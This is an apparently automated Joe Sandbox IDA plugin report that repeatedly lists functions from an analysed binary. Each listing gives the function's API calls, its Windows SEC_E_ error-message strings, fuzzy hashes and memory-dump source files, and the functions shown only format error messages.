Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_REQUIRED
API String ID: 1435330505-1475363564
Opcode ID: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
Instruction ID: aa79ef2ff4c84d6f41541e00b0bb3db94e7bd917ef9d34e0c6835d93da37838f
Opcode Fuzzy Hash: 130e6a446de66eca2d589899456355e79c5de7575e6b52e0601625ad88b0dbe6
Instruction Fuzzy Hash: 88118F22618A4295E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC99 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_DELEGATION_POLICY, xrefs: 00007FF7F1DAEC99
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_POLICY
API String ID: 1435330505-2634068886
Opcode ID: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
Instruction ID: ef4091316819b38f545ee943c8b64b9ceba32713c47b84434795e9db7d4862b4
Opcode Fuzzy Hash: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
Instruction Fuzzy Hash: 4C118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECB1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_DOWNGRADE_DETECTED, xrefs: 00007FF7F1DAECB1
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DOWNGRADE_DETECTED
API String ID: 1435330505-4035505591
Opcode ID: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
Instruction ID: 6a25e6517519d371752211ac305104d4d4cf63ea7647f5f2dcae3d48dc0d5dc1
Opcode Fuzzy Hash: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
Instruction Fuzzy Hash: 4E118F22A18A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC81 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 00007FF7F1DAEC81

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CRYPTO_SYSTEM_INVALID
API String ID: 1435330505-4258808491
Opcode ID: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
Instruction ID: 6c0e826ca13ee46f3c084e950569f438904b0a700790c1075d77c09e47de030f
Opcode Fuzzy Hash: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
Instruction Fuzzy Hash: 94118F22618A4285E7A8FF10A0442FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC8D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_DECRYPT_FAILURE, xrefs: 00007FF7F1DAEC8D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DECRYPT_FAILURE
API String ID: 1435330505-544245674
Opcode ID: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
Instruction ID: 45c724be2953f04d2d674658f7e7fd87f35f25140fd90187765b9449b0c307cd
Opcode Fuzzy Hash: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
Instruction Fuzzy Hash: 06118F22618A4285E7A9FF10A0442FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC5D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_CERT_WRONG_USAGE, xrefs: 00007FF7F1DAEC5D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_WRONG_USAGE
API String ID: 1435330505-580453001
Opcode ID: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
Instruction ID: c6fefb275f2c230a2f7725138abe4a7170925a542fad34fd35c8f42500a59e23
Opcode Fuzzy Hash: ce792466191a31168fd5d1624b547cb1894e0de980c79da1f368eb6b839474ed
Instruction Fuzzy Hash: BA118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC75 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 00007FF7F1DAEC75
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
API String ID: 1435330505-4241613852
Opcode ID: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
Instruction ID: cfd42f9e3b62c721a897f4949c81972f690d7ddd5e8166513d17ada5d7c4d736
Opcode Fuzzy Hash: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
Instruction Fuzzy Hash: DA118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC69 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_CONTEXT_EXPIRED, xrefs: 00007FF7F1DAEC69
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CONTEXT_EXPIRED
API String ID: 1435330505-1320710087
Opcode ID: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
Instruction ID: 43a6a89c86375fe79f837ea2914249ec901657c311fb455f89804d36182749db
Opcode Fuzzy Hash: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
Instruction Fuzzy Hash: D5118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC45 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_CERT_EXPIRED, xrefs: 00007FF7F1DAEC45
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_EXPIRED
API String ID: 1435330505-3862749013
Opcode ID: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
Instruction ID: 28364270f6df6d4cd318e021866ef3502e4fe2c2be639003c2ab90121210b1c1
Opcode Fuzzy Hash: 88de8354579e04ee29edc09b03b878f79f5a612902c9ab28cd79dd6bfbce5d0b
Instruction Fuzzy Hash: 10116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC39 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_CANNOT_PACK, xrefs: 00007FF7F1DAEC39

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_PACK
API String ID: 1435330505-1502336670
Opcode ID: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
Instruction ID: dc1eb6c301bef3b667ccd231692fd0e39f34382aeac07dbd2a1cdc169f398acb
Opcode Fuzzy Hash: 3d75235f3c568a5d41d28b0cdd34350df6baf9ae75e8372f00a15255d58dccb4
Instruction Fuzzy Hash: 68116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC51 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_CERT_UNKNOWN, xrefs: 00007FF7F1DAEC51
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CERT_UNKNOWN
API String ID: 1435330505-1381340633
Opcode ID: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
Instruction ID: c716f57a7c4233965e4610e95645a3002b4b34b8a679e1673b2782d2f7277072
Opcode Fuzzy Hash: daf07e83d593dc362a7ab3eb46dc30fcd452bd0328cd0cc7b538d4fa76b2a8e0
Instruction Fuzzy Hash: EE116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC21 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_BUFFER_TOO_SMALL, xrefs: 00007FF7F1DAEC21
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BUFFER_TOO_SMALL
API String ID: 1435330505-1965992168
Opcode ID: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
Instruction ID: 9fea92083878fd615bcac31426c8b2cf6d1a63eafdc373b206af8c6c1243b1ce
Opcode Fuzzy Hash: 6a42a592e6e0b22ff36b40e127086da92e25e084003e4c2e606844b3088ec4d5
Instruction Fuzzy Hash: DC118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

